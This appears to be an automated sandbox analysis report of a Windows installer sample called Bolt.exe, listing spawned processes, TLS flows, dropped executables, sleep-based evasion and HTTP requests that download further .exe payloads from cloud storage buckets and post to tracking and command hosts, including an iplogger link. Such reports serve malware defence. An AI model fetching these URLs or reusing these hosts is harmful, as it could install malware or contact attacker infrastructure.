Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Nov. 10, 2022, 9:46 a.m. | Nov. 10, 2022, 9:50 a.m. |
Process | PID | Command line |
---|---|---|
Bolt.tmp | 2620 | "C:\Users\test22\AppData\Local\Temp\is-93H7L.tmp\Bolt.tmp" /SL5="$80178,140559,56832,C:\Users\test22\AppData\Local\Temp\Bolt.exe" |
SHaedahaepahy.exe | 2116 | "C:\Users\test22\AppData\Local\Temp\70-d6d8b-65e-9938c-d92ff496b918b\SHaedahaepahy.exe" |
Byqibuqyqa.exe | 1356 | "C:\Users\test22\AppData\Local\Temp\7c-440d3-728-fac9b-5a0261a9df152\Byqibuqyqa.exe" |
iexplore.exe | 2996 | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6 |
iexplore.exe | 744 | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2996 CREDAT:145409 |
iexplore.exe | 204 | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2764 CREDAT:145409 |
explorer.exe | 1452 | C:\Windows\Explorer.EXE |

Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49167 -> 37.230.138.123:443 | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49 |
TLS 1.2 192.168.56.101:49170 -> 151.115.10.1:443 | C=US, O=Let's Encrypt, CN=R3 | CN=s3.pl-waw.scw.cloud | 13:5a:26:76:9b:02:b0:88:8d:ed:ac:89:e9:f3:d1:bd:f4:6d:ff:fd |
TLS 1.2 192.168.56.101:49174 -> 151.115.10.1:443 | C=US, O=Let's Encrypt, CN=R3 | CN=s3.pl-waw.scw.cloud | 13:5a:26:76:9b:02:b0:88:8d:ed:ac:89:e9:f3:d1:bd:f4:6d:ff:fd |
TLSv1 192.168.56.101:49215 -> 173.233.137.36:443 | C=US, O=Let's Encrypt, CN=R3 | CN=profitabletrustednetwork.com | 6a:48:45:b5:44:ae:75:f4:d2:b3:d4:5e:bc:2f:61:30:ec:d4:3a:99 |
TLSv1 192.168.56.101:49199 -> 37.230.138.123:443 | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49 |
TLSv1 192.168.56.101:49214 -> 173.233.137.36:443 | C=US, O=Let's Encrypt, CN=R3 | CN=profitabletrustednetwork.com | 6a:48:45:b5:44:ae:75:f4:d2:b3:d4:5e:bc:2f:61:30:ec:d4:3a:99 |
TLS 1.2 192.168.56.101:49168 -> 52.219.170.66:443 | C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.eu-central-1.amazonaws.com | bc:92:6b:62:48:5f:c5:08:60:03:a9:1e:bc:29:58:79:d7:4b:94:fb |
TLSv1 192.168.56.101:49193 -> 37.230.138.123:443 | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49 |

registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
section | CODE |
section | DATA |
section | BSS |

Suspicious features | Suspicious request |
---|---|
GET method with no useragent header | GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/up-da-b135l0bjgejx.exe |
GET method with no useragent header | GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/pub-b135l0bjgejx.exe |
GET method with no useragent header | GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/hand-b135l0bjgejx.exe |
POST method with no referer header, POST method with no useragent header | POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies |
GET method with no useragent header | GET http://www.google.com/ |
POST method with no referer header, POST method with no useragent header | POST https://connectini.net/Series/SuperNitouDisc.php |
GET method with no useragent header | GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe |
GET method with no useragent header | GET https://doll.s3.pl-waw.scw.cloud/widgets/powerOff.exe |
GET method with no useragent header | GET https://connectini.net/S2S/Disc/Disc.php?ezok=power2off2&tesla=8 |
POST method with no referer header, POST method with no useragent header | POST https://connectini.net/Series/Conumer4Publisher.php |
GET method with no useragent header | GET https://connectini.net/Series/publisher/1/KR.json |
POST method with no referer header, POST method with no useragent header | POST https://connectini.net/Series/Conumer2kenpachi.php |
GET method with no useragent header | GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json |
GET method with no useragent header | GET https://connectini.net/Series/configPoduct/2/goodchannel.json |

request | HEAD http://160dd0af-5534-4369-972f-5aa0f99c9324.s3.pl-waw.scw.cloud/workflow/poweroff-1mo67u5vspq3.exe |
request | GET http://160dd0af-5534-4369-972f-5aa0f99c9324.s3.pl-waw.scw.cloud/workflow/poweroff-1mo67u5vspq3.exe |
request | GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/up-da-b135l0bjgejx.exe |
request | GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/pub-b135l0bjgejx.exe |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/hand-b135l0bjgejx.exe |
request | POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies |
request | GET http://www.google.com/ |
request | POST https://connectini.net/Series/SuperNitouDisc.php |
request | GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe |
request | GET https://doll.s3.pl-waw.scw.cloud/widgets/powerOff.exe |
request | GET https://connectini.net/S2S/Disc/Disc.php?ezok=power2off2&tesla=8 |
request | POST https://connectini.net/Series/Conumer4Publisher.php |
request | GET https://connectini.net/Series/publisher/1/KR.json |
request | POST https://connectini.net/Series/Conumer2kenpachi.php |
request | GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json |
request | GET https://connectini.net/Series/configPoduct/2/goodchannel.json |
description | Byqibuqyqa.exe tried to sleep 138 seconds, actually delayed analysis time by 138 seconds |
description | SHaedahaepahy.exe tried to sleep 133 seconds, actually delayed analysis time by 133 seconds |
file | C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\idp.dll |
file | C:\Users\test22\AppData\Local\Temp\7c-440d3-728-fac9b-5a0261a9df152\Byqibuqyqa.exe |
file | C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\_isetup\_shfoldr.dll |
file | C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\PowerOff.exe |
file | C:\Program Files (x86)\Windows Sidebar\Kevideqoga.exe |
file | C:\Users\test22\AppData\Local\Temp\70-d6d8b-65e-9938c-d92ff496b918b\SHaedahaepahy.exe |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk |
cmdline | "C:\Windows\System32\cmd.exe" /c start https://iplogger.org/1RFfM4.psd |
file | C:\Users\test22\AppData\Local\Temp\is-93H7L.tmp\Bolt.tmp |